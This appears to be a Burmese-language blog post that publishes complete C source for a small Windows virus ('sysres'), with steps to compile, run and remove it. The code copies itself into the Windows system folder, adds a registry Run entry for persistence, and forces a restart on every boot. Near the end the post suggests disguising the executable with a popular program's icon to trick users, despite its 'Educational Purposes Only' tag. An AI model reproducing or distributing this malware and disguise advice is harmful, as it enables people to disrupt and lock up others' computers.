ေအာက္မွာေဖာ္ျပထားတဲ႔ virus source code ေတြကို ေလ့လာၾကည့္ပါ။ C language နဲ႔ အကၽြမ္းတ၀င္ ျဖစ္ျပီး သူေတြအေနနဲ႔အလြယ္တကူပဲ နားလည္ႏိုင္ပါလိမ့္မယ္။
#include<stdio.h>
#include<dos.h>
#include<dir.h>
int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}
( မွတ္ခ်က္ - အစိမ္းေရာင္နဲ႔ ျပထားတဲ႔ comment ေတြကို ဖတ္ၾကည့္ရင္နားလည္ေလာက္ပါတယ္။)
၁။ source code ကို ဒီမွာလည္း downlaod ႏိုင္ပါတယ္။
၂။ file ကို download ျပီးသြားရင္ Sysres.C နဲ႔ ေတြ႔ရပါလိမ့္မယ္။
၃။ ဒီ source code file ကို compile လုပ္ဖို႔လိုပါတယ္။ (C program ကို ဘယ္လုိ compile လုပ္မလဲ ဆိုတဲ့ post မွာၾကည့္ပါ။ (သို႔) Dev C++ compilerကို လည္းသံုးႏိုင္ပါတယ္။)
Virus ကုိ သင့္ရဲ႕ PC တြင္ စမ္းသပ္ျခင္း ႏွင့္ ဖယ္ရွားျခင္း
compile လုပ္ျပီးျပီဆိုရင္ ဒီ Virus ကို ဘာမွေၾကာက္လန္႔ေနစရာမလိုပဲ စိတ္ခ်လက္ခ် စမ္းသပ္ႏိုင္ပါတယ္။ စမ္းသပ္ဖို႔အတြက္ Sysres.exe file ကို double click လုပ္ပါ။ ျပီးရင္ system ကို restart လုပ္လိုက္ပါ။ ဒါျပီးရင္ေတာ့ သင့္ရဲ႕ PC ဟာ boot တက္ျပီ: desktop loaded ျဖစ္ျပီးဆိုတာနဲ႔ အလိုအေလွ်ာက္ restart ျဖစ္သြားပါလိမ့္မယ္။ အဲလိုမ်ိဳး ခဏခဏ ျဖစ္ပါလိမ့္မယ္။
စမ္းသပ္လို႔ အားရျပီးဆိုရင္ေတာ့ ဒီ virus ကို ေအာက္ပါအဆင့္မ်ားအတိုင္း ဖယ္ရွားႏိုင္ပါတယ္...
၁။ Reboot ျဖစ္ျပီးတာနဲ႔ SAFE MODE ထဲကိုသြားပါ။
၂။ X:\Windows\System ( X ဆိုတာကေတာ့ C,D,E (သို႔) F ကိုဆိုလိုတာပါ။)
၃။ Sysres.exe ဆိုတဲ႔ နာမည္နဲ႔ file ကို ရွာျပီး delete လုပ္လိုက္ပါ။
၄။ ျပီးရင္ run ထဲမွာ regedit လို႔ရိုက္ျပီး registry editor ထဲမွာ
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Run
သို႔သြားပါ။ျပီးရင္ ညာဘက္က pane ထဲမွာ "sres" ဆိုတဲ႔ နာမည္နဲ႔ entry တစ္ခုကိုေတြ႔ပါလိမ့္မယ္။ အဲဒီ entry ကို delete လုပ္လိုက္ပါ။ ဒါဆိုရင္ ဒီ virus ကို ဖယ္ရွားျခင္း ေအာင္ျမင္စြာ ျပီးဆံုးသြားပါျပီ။
Virus အလုပ္လုပ္ျခင္း ေနာက္ကြယ္မွ Logic
virus ရဲ႕ လုပ္ေဆာင္ခ်က္ေတြရဲ႕ ေနာက္ကြယ္မွာရွိတဲ႔ logic(Algorithm) ကို နဲနဲေလာက္ရွင္းျပပါမယ္။ ဒါေပမယ့္ program နဲ႔ ပတ္သတ္တဲ႔ နည္းပညာအေသးစိတ္ကိုေတာ့ မရွင္းပါဘူး ။
LOGIC:
၁။ ပထမဆံုး virus က Root partation( Windows ကို install လုပ္ထားတဲ႔ partation) ကို လိုက္ရွာပါတယ္။
၂။ ေနာက္တဆင့္အေနနဲ႔ Virus က သူရဲ႕ file ေတြကို X:\Windows\System ထဲမွာ copy ကူးျပီးျပီလား( ကူးစက္ျပီးျပီလား) မကူးရေသးဘူးလား ဆိုတာကို ဆံုးျဖတ္တြက္ခ်က္ပါတယ္။
၃။ copy မလုပ္ရေသးဘူးဆိုရင္ေတာ့ X:\Windows\System ထဲမွာ သူ႔ကိုယ္သူ copy လုပ္ျပီး startup ေပၚမွာ virus file ကိုထည့္ႏိုင္ဖို႔အတြက္ registry entry တစ္ခုကိုျပဳလုပ္ပါလိမ့္မယ္။
၄။ ဒါမွမဟုတ္လို႔ X:\Windows\System ထဲမွာ virus ကိုေတြ႔မယ္ဆိုရင္ေတာ့ ၄င္းက computer ကို restart လုပ္ဖို႔ command ေပးပါလိမ့္မယ္။
ဒီ process က PC restart ျဖစ္ျပီးတဲ႔အခါတိုင္းမွာ ျဖစ္ေနပါလိမ့္မယ္။
မွတ္ခ်က္ - အကယ္၍ Sysres.exe ကို double click လုပ္ျပီးလို႔မွာ restart ျဖစ္မသြားဘူးဆိုရင္ ဒီ restarting process ဟာ system ရဲ႕ ေနာက္ထပ္ boot ေတြမွာ ျဖစ္ပါလိမ့္မယ္။
ဒီ virus exe fiie ရဲ႕ icon ကို အခုေလာေလာဆယ္ popular ျဖစ္ေနတဲ႔ software တစ္ခုရဲ႕ icon ပံုစံနဲ႔ ေျပာင္းလိုက္မယ္ဆိုရင္ ... ရွယ္ျဖစ္သြားျပီးေပါ့ေနာ္။ (EXEဖိုင္ရဲ႕ icon ပံုစံကိုဘယ္လိုေျပာင္းမလဲ ဆိုတဲ႔ post မွာၾကည့္ပါ။ )
(Educational Purposes Only)
Post a Comment